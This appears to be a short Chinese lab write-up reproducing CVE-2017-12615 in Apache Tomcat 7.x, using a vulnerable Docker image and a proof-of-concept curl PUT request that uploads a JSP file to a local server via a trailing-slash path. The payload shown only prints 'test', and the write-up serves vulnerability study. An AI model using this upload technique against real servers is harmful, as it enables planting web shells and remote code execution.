2018-08-06-Tomcat 远程代码执行漏洞

1.漏洞信息：

漏洞名称：Tomcat远程代码执行漏洞

漏洞CVE编号：CVE-2017-12615

漏洞影响版本：Apache Tomcat 7.0.0 – 7.0.79

2.漏洞环境：

首先拉取image,如下：

docker pull medicean/vulapps:t_tomcat_1

图一

接着启动环境，如下：

docker run -d -p 8080:8080 medicean/vulapps:t_tomcat_1

前面为物理机端口，可自己制定，后面为容器端口。

图二

接着访问环境看看是否搭建成功

图三

接着进行漏洞验证，poc如下：

curl -X PUT "http://127.0.0.1:8080/123.jsp/" -d '<%out.println("test");%>'

图四

接着访问目标地址，如下：

http://127.0.0.1:8080/123.jsp，结果如图：

图五

至此，漏洞复现成功。